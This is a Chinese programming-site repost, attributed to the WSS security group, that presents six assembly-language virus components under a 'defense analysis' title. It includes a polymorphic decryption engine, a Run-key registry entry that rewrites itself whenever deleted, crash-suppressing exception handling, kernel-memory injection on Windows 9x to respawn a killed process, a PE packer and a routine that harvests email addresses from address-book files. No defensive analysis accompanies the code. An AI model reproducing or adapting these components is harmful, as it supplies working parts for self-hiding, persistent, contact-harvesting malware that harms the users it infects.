首頁 > 編程 > Java > 正文

病毒源碼解析之防御分析

2019-09-06 23:33:18
字體:
來源:轉載
供稿:網友
1、超級病毒變形引擎

此段代碼會在DATA段內生成一個解密代碼。

.586p
.model flat,STDCALL
extrn ExitProcess: proc
VirusSize=100h
.data

DecodeMethod dd ?
DeCode:
pushad
call Encode
db 100h dup(11h)
Encode:
db 100h dup(0cch)
RndReg0 dd 0 ;eax
RndReg1 dd 0 ;ebx
RndCode dd 0 ;Rnd Code
RndMima dd 60932561 ;Rnd Password

.code
@@Start:
mov eax,RndMima
ror eax,7
mov RndCode,eax

mov eax,RndCode
mov ecx,eax
and eax,011b
mov RndReg0,eax
xor ecx,RndMima
and ecx,011b
cmp eax,ecx
jnz short ChooseRegOk
inc ecx
and ecx,011b
ChooseRegOk:
mov RndReg1,ecx


mov edi,offset Encode

ror RndCode,1
call GetBxCode,0,RndReg0,RndCode
mov esi,eax
ContFillStep0:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep0
dec edi

ror RndCode,1
call GetBxCode,1,RndReg1,RndCode
mov esi,eax
ContFillStep1:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep1
dec edi

mov ebx,edi ;//計算機Jmp指令用

ror RndCode,1
call GetBxCode,2,RndReg0,RndCode
mov esi,eax
ContFillStep2:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep2
dec edi

mov eax,RndMima
mov [edi-4],eax ;//填寫隨機密碼
mov eax,RndCode
and eax,01
mov DecodeMethod,eax ;//填寫DeCode方法

ror RndCode,1
call GetBxCode,3,RndReg0,RndCode
mov esi,eax
ContFillStep3:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep3
dec edi

ror RndCode,1
call GetBxCode,4,RndReg1,RndCode
mov esi,eax
ContFillStep4:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep4
dec edi

ror RndCode,1
call GetBxCode,5,RndReg0,RndCode
mov esi,eax
ContFillStep5:
cld
lodsb
stosb
cmp al,0cch
jnz ContFillStep5
dec edi

mov al,0c3h
mov [edi],al ;//填寫Ret指令

sub ebx,edi
mov [edi-1],bl ;//填寫jmp指令

int 3;

jmp DeCode
ret
GetBxCode proc uses ebx ecx edx esi edi,Step:dword,Reg:dword,Rnd:dword
call GetBxCodeAddr
Step0_Eax:
mov eax,[esp]
int 3;
pop eax
push eax
int 3;
Step0_Ebx:
pop ebx
push ebx
int 3;
push dword ptr[esp]
pop ebx
int 3;
Step0_Ecx:
mov ecx,[esp]
int 3;
pop ecx
push ecx
int 3;
Step0_Edx:
mov edx,[esp]
int 3;
mov edx,esp
mov edx,[edx]
int 3

Step1_Eax:
mov eax,VirusSize
int 3
sub eax,eax
add ax,VirusSize+3081h
sub ax,3081h
int 3
Step1_Ebx:
mov ebx,VirusSize
int 3;
xor ebx,ebx
or bx,VirusSize
int 3;
Step1_Ecx:
sub ecx,ecx
xor ecx,(VirusSize xor 3181h)
xor ecx,(3181h)
int 3;
mov ecx,0
and cx,VirusSize
int 3
Step1_Edx:
and edx,0
xor dx,(VirusSize-0281h)
add dx,0281h
int 3;
xor edx,edx
sub edx,(0181h-VirusSize)
sub edx,-0181h
int 3;

Setp2_Eax:
xor [eax],12345678h
int 3
add [eax],12345678h
int 3
Setp2_Ebx:
xor [ebx],12345678h
int 3;
add [ebx],12345678h
int 3;

Setp2_Ecx:
xor [ecx],12345678h
int 3;
add [ecx],12345678h
int 3;
Setp2_Edx:
xor [edx],12345678h
int 3;
add [edx],12345678h
int 3;
Step3_Eax:
add eax,4
int 3
inc eax
inc eax
inc eax
inc eax
int 3;
Step3_Ebx:
add ebx,5
dec ebx
int 3
add ebx,2
add ebx,2
int 3;
Step3_Ecx:
sub ecx,-4
int 3
sub ecx,-5
dec ecx
int 3;
Step3_Edx:
inc edx
sub edx,-3
int 3
add edx,04
int 3;

Step4_Eax:
sub eax,4
int 3
dec eax
dec eax
dec eax
sub eax,1
int 3;
Step4_Ebx:
dec ebx
sub ebx,3
int 3;
dec ebx
dec ebx
sub ebx,2
int 3;
Step4_Ecx:
add cx,123
sub cx,123+4
int 3
sub cx,-4
dec cx
sub cx,7
int 3
Step4_Edx:
sub dx,2
dec dx
sub dx,1
int 3
inc edx
sub dx,5
int 3;
Step5_Eax:
jnz $
int 3
ja $
int 3
Step5_Ebx:
jg $
int 3
jnb $
int 3
Step5_Ecx:
jnl $
int 3
jnz $
int 3
Step5_Edx:
ja $
int 3
jg $
int 3

GetBxCodeAddr:
pop esi
mov al,0cch ;//指令分割符
mov ecx,Step
shl ecx,1
shl ecx,1
add ecx,Reg ;//計算機得到的指令位置
shl ecx,1
and Rnd,01b
add ecx,Rnd
jcxz short GetBxCodeOver
ContFindCode:
push ecx
ContFindCC:
inc esi
cmp [esi],al
jnz ContFindCC
pop ecx
loop ContFindCode
mov eax,esi
inc eax
ret
GetBxCodeOver:
mov eax,esi
ret
GetBxCode endp


end @@Start


2、Windows 9x/2000/xp 瑣定注冊表

.586p
.model flat,STDCALL
.data

HKeyStr db 'SOFTWAREMicrosoftWindowsCurrentVersionRun',0
ValueName db 'wap32',0
PathName db 'wap32.exe',0

.code

extrn RegOpenKeyA: proc
extrn RegSetValueExA: proc
extrn RegCloseKey: proc
extrn ExitProcess: proc
extrn RegNotifyChangeKeyValue: proc
extrn CreateThread: proc
extrn Sleep: proc
extrn RegQueryValueExA: proc

start:
push eax
call RegOpenKeyA,080000002h,offset HKeyStr,esp
pop ebx
call RegSetValueExA,ebx,offset ValueName,0,01,offset PathName,100h

sub esp,100h
mov eax,esp
push 100h
call RegQueryValueExA,ebx,offset ValueName,0,0,eax,esp
pop eax
add esp,100h

push eax
call CreateThread,0,0,offset RegProtectProc,ebx,0,esp
pop eax
call Sleep,1000*60*3
ret

RegProtectProc proc hKey:dword
mov ebx,hKey
sub esp,100h
mov edi,esp
call GetProtectKeyName
db 'wap32',0
GetProtectKeyName:
pop esi
push 100h
call RegQueryValueExA,ebx,esi,0,0,edi,esp
pop eax
WaitRegChangeNotify:
call RegNotifyChangeKeyValue,ebx,0,4,0,0
call RegSetValueExA,ebx,esi,0,01,edi,100h
jmp short WaitRegChangeNotify
RegProtectProc endp

end start



3、 Windows 9x/2000 意外處理通用程序


此段程序可以達到屏蔽程序錯誤的效果

include wap32.inc

.386p
.model flat,stdcall

extrn MessageBoxA: proc
extrn ExitProcess: proc

.data

Msg db 'Fuck',0

SetSehFrame: ;ecx=忽略錯誤繼續執行地址
pop eax ;彈出返回地址
push ecx ;保存忽略錯誤繼續執行地址
call PushExceptionProc
jmp short Exception
PushExceptionProc:
push fs:dword ptr[0]
mov fs:[0],esp
call GetEspAddr
push D [edx] ;保存原Esp地址值
mov [edx],esp
jmp eax
ClearSehFrame:
pop eax ;彈出返回地址
call GetEspAddr
mov esp,[edx]
pop D [edx] ;恢復原Esp地址值
pop fs:dword ptr[0]
pop ecx
pop ecx ;彈出忽略錯誤繼續執行地址
jmp eax

Exception proc pRecord,pFrame,pContext,pDispatch
call PushSehBackProc
call ClearSehFrame
jmp ecx
PushSehBackProc:
pop ecx
mov eax,pContext
mov [eax.cx_Eip],ecx
xor eax,eax ;忽略錯誤繼續執行
ret
Exception endp

GetEspAddr:
call PushOffsetEspAddr
dd ?
PushOffsetEspAddr:
pop edx
ret


.code

Start:
call PushErrorProc
call MessageBoxA,0,offset Msg,offset Msg,0
ret
PushErrorProc:
pop ecx
call SetSehFrame
mov ds:[0],eax
call ClearSehFrame
ret


end Start



4、Windows 9x 下進程不死術

此段程序首先實現Win9x下注射遠程線程(新技術)
然后與Win2k下進程不死術一樣了。
include Win32.inc

.386p
.model flat,stdcall

extrn GetProcAddress: proc
extrn WinExec: proc
extrn MessageBoxA: proc
extrn Sleep: proc
extrn GetCurrentProcessId: proc
extrn OpenProcess: proc
extrn GetCurrentProcess: proc
extrn WriteProcessMemory: proc
extrn GetExitCodeProcess: proc

.data

;問題,要Sleep()這樣做使Kernel32有機會更新數據
KnlThread proc ProcID:dword
call GetKnlOpenProcess
KnlOpenProcess dd ?
GetKnlOpenProcess:
pop eax
call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID
or eax,eax
jz short ExitProtectProc
mov ebx,eax
call GetKnlWaitForSingleObject
KnlWaitForSingleObject dd ?
GetKnlWaitForSingleObject:
pop eax
call [eax],ebx,-1h
call GetFileNameAddress
GetFileNameAddress:
pop ecx
add ecx,offset FileName-offset GetFileNameAddress
call GetKnlWinExec
KnlWinExec dd ?
GetKnlWinExec:
pop eax
call [eax],ecx,01
ExitProtectProc:
ret
KnlThread endp

FileName db 'c:wap32.exe',0

KnlOpenProcessStr db 'OpenProcess',0
KnlWaitForObjectStr db 'WaitForSingleObject',0
KnlWinExecStr db 'WinExec',0
KnlSleepStr db 'Sleep',0
KnlCreateKnlThreadStr db 'CreateKernelThread',0

.code

Start:
call GetProcAddress,0bff70000h,offset KnlOpenProcessStr
mov KnlOpenProcess,eax
call GetProcAddress,0bff70000h,offset KnlWaitForObjectStr
mov KnlWaitForSingleObject,eax
call GetProcAddress,0bff70000h,offset KnlWinExecStr
mov KnlWinExec,eax

call MoveDataToKnl,offset Start,0bff70600h,100h

call GetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr
mov ebx,eax
call GetCurrentProcessId
push eax
call ebx,0,0,0bff70000h+600h,eax,0,esp
pop eax
call MessageBoxA,0,offset FileName,offset FileName,0
ret

MoveDataToKnl proc uses ebx esi edi,Src:dword,Des:dword,nCx:dword
push eax
sidt [esp-2]
pop eax
add eax,3*8
mov ebx,[eax]
mov edx,[eax+4]
call SetIdt03
pushad
mov [eax],ebx
mov [eax+4],edx
cld
rep movsb
popad
iret
SetIdt03:
cli
pop W[eax]
pop W[eax+6]
mov esi,Src
mov edi,Des
mov ecx,nCx
int 3;
sti
ret
MoveDataToKnl endp

end Start


5、簡單算法,高效率壓縮PE文件

.586p
.model flat,STDCALL
.data

OldFile db 'pe.exe',0
NewFile db 'pe.zzz',0

FileData db 0,0
.code
extrn _lopen: proc,_lcreat: proc
extrn _lread: proc,_lwrite: proc
extrn _lclose: proc
extrn ExitProcess: proc
start:
call _lopen,offset OldFile,0
cmp eax,-1
jz ExitProc
mov esi,eax
call _lcreat,offset NewFile,0
cmp eax,-1
jz CloseOldFile
mov edi,eax

xor ebx,ebx
ReadData:
call _lread,esi,offset FileData,1
or eax,eax
jz short ReadOver
movzx eax,FileData
or eax,eax
jnz short NoZero
inc ebx
cmp ebx,0ffh
jnz short ReadData
xor eax,eax
mov ah,bl
xchg ax,word ptr FileData
call _lwrite,edi,offset FileData,2
xor ebx,ebx
jmp short ReadData
NoZero:
or ebx,ebx
jnz short NoZeroData
call _lwrite,edi,offset FileData,1
jmp short ReadData
NoZeroData:
push eax
xor eax,eax
mov ah,bl
mov word ptr FileData,ax
call _lwrite,edi,offset FileData,2
xor ebx,ebx
pop eax
mov FileData,al
call _lwrite,edi,offset FileData,1
jmp ReadData
ReadOver:
or ebx,ebx
jz short CloseFile
xor eax,eax
mov ah,bl
xchg ax,word ptr FileData
call _lwrite,edi,offset FileData,2
xor ebx,ebx
CloseFile:
call _lclose,edi
CloseOldFile:
call _lclose,esi
ExitProc:
call ExitProcess,0

end start

6、提取Windows地址薄文件(*.WAB)的Email信息

.586p
.model flat,STDCALL
.data

MailFile db 'My.WAB',0

.code

extrn _lopen: proc,_lcreat: proc
extrn _lread: proc,_lwrite: proc
extrn _llseek: proc
extrn _lclose: proc
extrn MessageBoxA: proc
extrn ExitProcess: proc
extrn WideCharToMultiByte: proc

start:
call _lopen,offset MailFile,0
cmp eax,-1
jz short ExitProc
mov ebx,eax
sub esp,100h
mov edi,esp
call _lread,ebx,edi,100h
cmp eax,100h
jnz short CloseFile
mov eax,[edi+60h] ;得到Unicode郵件名偏移
call _llseek,ebx,eax,0
mov ecx,[edi+64h] ;得到Unicode郵件名個數
ContWabMail:
push ecx
call _lread,ebx,edi,44h ;讀一個記錄
cmp eax,44
sub esp,100h
mov eax,esp
call WideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0
mov eax,esp
call MessageBoxA,0,eax,eax,0
add esp,100h
pop ecx
loop short ContWabMail
CloseFile:
call _lclose,ebx
ExitProc:
call ExitProcess,0

end start



WSS(Whitecell Security Systems),一個非營利性民間技術組織,致力于各種系統安全技術的研究。堅持傳統的hacker精神,追求技術的精純。
WSS 主頁:http://www.whitecell.org/
WSS 論壇:http://www.whitecell.org/forum/
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
久久re6热在线播放